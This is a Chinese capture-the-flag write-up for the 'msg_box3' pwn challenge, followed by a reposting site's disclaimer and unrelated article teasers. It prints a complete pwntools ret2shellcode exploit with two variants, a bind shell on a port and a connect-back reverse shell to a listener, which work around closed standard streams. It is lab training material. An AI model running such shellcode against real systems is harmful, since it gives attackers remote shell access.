[socket 弹 shell] msg_box3

前言

题目比较简单,没开 Canary 和 NX.

    Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX disabledPIE:      PIE enabledRWX:      Has RWX segments

漏洞利用与分析:

白给的函数调用,其中 ptr + 10 是用户可控的,而 NX 又没开,所以 ret2shellcode

主要的考点就是其在执行 shellcode 之前,把 stdin/stdout/stderr 全给关了。但是这里题目并没有开沙箱,所以直接利用 socket 进行通信拿 shell。

exp 如下:

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'io = process("./pwn")
elf = ELF("./pwn")
libc = elf.libcdef debug():gdb.attach(io)pause()sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'Enter your choice: 'sla(menu, b'1')
sla(b'):\n', b'XiaozaYa')
def exp1():port = 5555shellcode = asm(shellcraft.bindsh(port, 'ipv4'))sla(b'):\n', shellcode)sla(menu, b'3')x = remote('127.0.0.1', port)x.interactive()def exp2():port = 4444x = listen(port)shellcode = asm(shellcraft.connect('127.0.0.1', port) + shellcraft.dupsh())sla(b'):\n', shellcode)sla(menu, b'3')x.interactive()#shellcode = asm(shellcraft.findpeersh(io.lport))
#sla(b'):\n', shellcode)
#sla(menu, b'3')
#sh()if __name__ == '__main__':exp1()#exp2()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/190532.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Long-Context下LLM模型架构全面介绍

深度学习自然语言处理 原创作者:cola 随着ChatGPT的快速发展,基于Transformer的大型语言模型(LLM)为人工通用智能(AGI)铺平了一条革命性的道路,并已应用于知识库、人机界面和动态代理等不同领域。然而,存在一个普遍的限制:当前许多…

模拟业务流程+构造各种测试数据,一文带你测试效率提升80%

我们做软件测试的时候,经常需要页面有点数据,特别是涉及到一些数据统计的测试用例的时候,更是需要源源不断的测试数据让前端页面生成对应的报表测试统计的数据正确性。 如果我们通过手工的方式操作业务流程来实现数据的构造的话,少…

【Cisco Packet Tracer】子网划分的计算及实验

子网划分:Internet组织机构定义了五种IP地址,有A、B、C三类地址。A类网络有126个,每个A类网络可能有16777214台主机,它们处于同一广播域。而在同一广播域中有这么多节点是不可能的,网络会因为广播通信而饱和&#xff0…

在 ArcGIS 软件中添加左斜宋体(东体)的方法与步骤

河流水系在作图时一般设置为左斜宋体(东体)、蓝色,比如黄河、青海湖等,如下图所示: 标准地图水系注记 下面讲解如何在 ArcGIS 软件中添加左斜宋体(东体),首先需要下载左斜宋体&#…

【开源】基于JAVA语言的校园疫情防控管理系统

项目编号: S 037 ,文末获取源码。 \color{red}{项目编号:S037,文末获取源码。} 项目编号:S037,文末获取源码。 目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 学生2.2 老师2.3 学校管理部门 三、…

《管家婆》辉煌2005+(V4.0)简单教程

《管家婆》辉煌2005(V4.0)简单教程 呉師傅 运行环境:   操作系统推荐使用Win2000(32位)、WinXP(32位)、Win7(位) 兼容:Win7(64位&#xff09…

MySQL的数学函数

在MySQL中,有许多内置的数学函数可以帮助我们进行各种复杂的数学计算。这些函数包括round、ceil、floor、truncate、mod和pow等。下面,我将详细介绍这些函数的用法。 1.round(x,保留位数) round(x,保留位数)函数:用于将数字x四舍五入到指定…

阿里云MySQL从 2003->1251->1396

目的 由于需要在阿里云的实例中装MySQL数据库,安装前期(本地访问)还是挺顺利的,但是到了远程连接的时候,却出现了一系列的Bug,以为是没有 实名认证没有备案 的原因导致的,但是后来…

vue中中的动画组件使用及如何在vue中使用animate.css

“< Transition >” 是一个内置组件&#xff0c;这意味着它在任意别的组件中都可以被使用&#xff0c;无需注册。它可以将进入和离开动画应用到通过默认插槽传递给它的元素或组件上。进入或离开可以由以下的条件之一触发&#xff1a; 由 v-if 所触发的切换由 v-show 所触…

Kubernetes中PostgreSQL的推荐方法

1*HDp3_wvu78Vaa-4C9NFHaQ.gif 你是否曾听说过避免在Kubernetes中运行数据库的建议&#xff1f;有人认为Kubernetes不适合有状态的应用程序&#xff0c;但这些说法是否属实&#xff1f;让我们深入探讨并挑战这些说法。 Kubernetes&#xff1a;有关有状态工作负载的误解平台 在涉…

http请求签名生成算法

算法文档&#xff1a; 签名生成算法 签名生成步骤 步骤1、请求参数拼接为有序字符串 步骤2、将签名字符串使用MD5摘要算法生成MD5值 步骤3、将生成的签名追加到原参数后 lua实现 local md5 require("md5") -- 使用 Lua 的 md5 库&#xff0c;你可能需要安装相应的库…

Zabbix 6.0部署+自定义监控项+自动发现与自动注册+部署zabbix代理服务器

Zabbix 6.0 Zabbix 6.0一、关于zabbix1、什么是zabbix2、zabbix工作原理3、zabbix 6.0 特性4、zabbix 6.0 功能组件 二、Zabbix 6.0 部署1、 部署 zabbix 服务端(1) 部署 Nginx PHP 环境并测试(2) 部署数据库(3) 编译安装 zabbix server 服务端(4) 部署 Web 前端&#xff0c;进…

Java核心知识点整理大全27-笔记(已完结)

30. 云计算 30.1.1. SaaS SaaS 是 Software-as-a-Service&#xff08;软件即服务&#xff09; 30.1.2. PaaS PaaS 是 Platform-as-a-Service 的缩写&#xff0c;意思是平台即服务。 把服务器平台作为一种服务提供的 商业模式。通过网络进行程序提供的服务称之为 SaaS(Softw…

编写bat脚本执行msyql建库sql

使用cmd命令执行(windows下) 【MySQL的bin目录】\mysql –u用户名 –p密码 –D数据库<【sql脚本文件路径全名】&#xff0c;示例&#xff1a; D:\mysql\bin\mysql –uroot –p123456 -Dtest<d:\test\ss.sql 注意&#xff1a; A、如果在sql脚本文件中使用了use 数据库&…

什么是CAS, 什么是AQS

文章目录 什么是CAS, 什么是AQSCASAQS 什么是CAS, 什么是AQS CAS AQS AQS 全称是AbstractQueuedSynchronizer&#xff0c; 是juc 下一个核心的抽象类&#xff0c;用于构建各种同步器和锁 比如我们熟悉的 ReentrantLock、ReadWriteLock、CountDownLatch等等是基于AQS. 首先在…

python第3天之函数

深入理解 Python 中的函数 简介 在编程中&#xff0c;函数是组织和复用代码的基本单元。Python 作为一门高级编程语言&#xff0c;提供了丰富的函数特性来帮助开发者编写清晰、模块化和高效的代码。在本文中&#xff0c;我们将深入探讨 Python 函数的定义、调用、参数、返回值…

接口响应时长几十秒问题排查以及解决

目录 背景 解决方案 总结 背景 线上系统运行几年后&#xff0c;被项目上提bug&#xff0c;有些接口响应很慢&#xff0c;加载页面要几十秒 解决方案 1、步骤一&#xff0c;加索引 性能优化成本高&#xff0c;需要开发周期&#xff0c;临时方案先分析慢sql&#xff0c;通过增…

目标检测——Faster R-CNN算法解读

论文&#xff1a;Faster R-CNN: Towards Real-Time Object Detection with Region Proposal Networks 作者&#xff1a;Shaoqing Ren, Kaiming He, Ross Girshick, and Jian Sun 链接&#xff1a;https://arxiv.org/abs/1506.01497 代码&#xff1a;https://github.com/rbgirsh…

Docker diff 命令

docker diff&#xff1a;检查容器里文件结构的更改。 语法 docker diff [OPTIONS] CONTAINER实例 查看容器mymysql的文件结构更改&#xff1a; docker diff mymysql##效果如下&#xff1a; A /logs A /mysql_data C /run C /run/mysqld A /run/mysqld/mysqld.pid A /run/my…

(C)一些题(7)

1.若要说明一个类型名STP,使得定义语句STP s;等价于char *s;, 以下选项中正的是( )。 A.typedef STP char *s B.typedef *char STP C.typedef STP *char Dhypeder char *STP 分析&#xff1a;&#xff08;1&#xff09;先按定义变量的方法写出定义体(char *s;) ②将变量名换成…